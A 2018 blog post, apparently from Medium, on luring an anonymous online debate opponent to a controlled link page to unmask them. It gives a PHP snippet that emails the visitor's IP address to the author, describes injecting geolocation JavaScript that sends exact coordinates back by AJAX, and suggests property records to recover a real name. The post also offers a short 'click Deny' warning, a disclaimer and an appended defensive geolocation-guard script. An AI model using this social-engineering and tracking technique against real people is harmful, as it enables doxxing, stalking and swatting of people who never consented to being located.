Geolocation `Attack`: Entrapping your anonymous opponent online

How to misuse the Geolocation API to strip your online opponent’s anonymity. And, how to save yourself from it.

Ax Sharma
Nov 24, 2018 · 4 min read
Google Chrome: Consent Popup frequently seen for websites requesting your real location

Someone giving you a hard time during a discussion online? What if you could find out where that commenter is, or who they are?

But also, look at this the other way — what if they could trick you into revealing your real location and name?

That is one of the ways the HTML5 Geolocation API, frequently used by most websites today to ‘know your location’, can be misused.

If you are not familiar with Geolocation, head right over to W3Schools.

But anyway, the actual “attack” is pretty straightforward and requires a bit of social engineering. When you find yourself caught up in a heated debate about hot-button issues, whether on Reddit, Medium or anywhere else, you would want to say something like “Look here http://your-website.tld/some/page. The statistics don’t lie. You’ll see my point… ”.

Credit: https://medium.com/@benjaminsledge/honest-thoughts-from-a-veteran-about-gun-control-and-mental-health-c74930488e28

FYI, the get_geolocation link above is fictitious. I’m trying to show you that I could create one on my website and have you redirected to the actual page that proves some of my claims.

High chances, if you are debating with someone who is seriously intellectual and not just , they’ll click on the link out of curiosity.

This is where the magic happens.

The link should lead them to a page controlled by you. At the very least, a line of server-side code will reveal their IP address:

<?php
// Email me their IP
mail("me@my.email", "Opponent's IP", "IP is: " . $_SERVER['REMOTE_ADDR']);
// Redirect them to the actual page
header("Location: http://redirect/to/the/actual/page");
?>

To make it look more legitimate, you can redirect the user to the actual URL which loads the resource that supports your argument. If you don’t do this, a blank page will either raise suspicion or enrage the “opponent”. They’ll likely call you an “idiot” for posting a dead link.

There are other ways to retrieve the IP address of a visitor too. Note that this applies to anyone who clicks your link, not just one visitor, so don’t be so confident that the IP you get is that user’s alone, unless you were going back and forth with only one person in a heated debate.

You can then use an IP tracer or a simple API to reveal the city and country in which the IP, and hence the user, is likely based. This won’t work well if the user is on an anonymous VPN, for obvious reasons.

So, why not also inject client-side JavaScript code on the page which asks the user for their location? Rather than relying on the IP address alone, the HTML5 Geolocation API leverages a couple of data points (such as Wi-Fi SSIDs, GPS, etc.) which can accurately identify the user’s location.

Credit: https://www.w3schools.com/html/html5_geolocation.asp

If they are careless, they may just click ‘Allow’ to dismiss the popup, not giving it a second thought. Then after a few seconds, once you retrieve the coordinates, you could have your page send them to your server using a sleek AJAX request, and then have your page redirect the user to the actual resource related to your argument. Simple enough, and it gets you the exact coordinates of the user.

If they live in a big enough house, you’ll likely know exactly where they are. Take it a step further and the public records, property / deeds county records will even reveal their real name!

Beware though, the same social engineering tactic can very well be used against you. No one likes to be doxxed or SWATted, so read this piece as mere weekend entertainment and to safeguard yourself, instead of getting adventurous.

Next time you see a website requesting your consent for your location, unless it has a good enough reason to, best to click “Deny”.
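The “Deny” advice above can also be enforced per origin in script. The following is an added example, not code from the original article: a deny-by-default guard around the Geolocation API, where guardGeolocation, ALLOWED_ORIGINS, the allowlisted origin and the stand-in navigator object are all hypothetical and constructed for illustration.

```javascript
// guardGeolocation and ALLOWED_ORIGINS are hypothetical names for this sketch.
const ALLOWED_ORIGINS = new Set(["https://maps.example.com"]); // constructed allowlist
const PERMISSION_DENIED = 1; // GeolocationPositionError.PERMISSION_DENIED

function guardGeolocation(nav, origin, allowed = ALLOWED_ORIGINS, log = []) {
  const real = nav.geolocation;
  if (!real) return log; // no API exposed, nothing to guard
  const deny = (method) => (success, error) => {
    log.push({ origin, method, decision: "denied" });
    // Same error code a page sees when the user clicks "Deny" on the prompt.
    if (typeof error === "function") error({ code: PERMISSION_DENIED, message: "denied" });
    return 0; // watchPosition callers expect a numeric watch id
  };
  const pass = (method) => (...args) => {
    log.push({ origin, method, decision: "allowed" });
    return real[method](...args);
  };
  const wrap = allowed.has(origin) ? pass : deny;
  const guarded = {
    getCurrentPosition: wrap("getCurrentPosition"),
    watchPosition: wrap("watchPosition"),
    clearWatch: (id) => real.clearWatch(id),
  };
  // Shadow the property so page scripts reach the guard, not the real object.
  Object.defineProperty(nav, "geolocation", { value: guarded, configurable: false });
  return log;
}

// Constructed stand-in for a browser's navigator so the sketch runs under Node.
function fakeNavigator() {
  const fix = { coords: { latitude: 0, longitude: 0 } }; // constructed value
  return {
    geolocation: {
      getCurrentPosition: (ok) => ok(fix),
      watchPosition: (ok) => { ok(fix); return 7; },
      clearWatch: () => {},
    },
  };
}

// Simulates a page at `origin` asking for the visitor's position.
function demo(origin) {
  const nav = fakeNavigator();
  const log = guardGeolocation(nav, origin);
  let result = "no callback";
  nav.geolocation.getCurrentPosition(() => { result = "position"; },
    (e) => { result = "error:" + e.code; });
  return { result, log };
}
```

In a real browser the guard would have to run in the page's own context before any other script; the browser's site settings for blocking location prompts remain the sturdier control.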

Credit: Google Maps

Disclaimer: This article is meant for educational and entertainment purposes only. My intention is for you to safeguard yourself and think twice before revealing your location to apps and any website requesting it. Do not violate any laws in your area and respect the privacy of others, much as you’d prefer yours to be respected. I will not be responsible if you get yourself in trouble, break any laws or infringe on the privacy of another person.

© 2018. Akshay ‘Ax’ Sharma. All Rights Reserved.
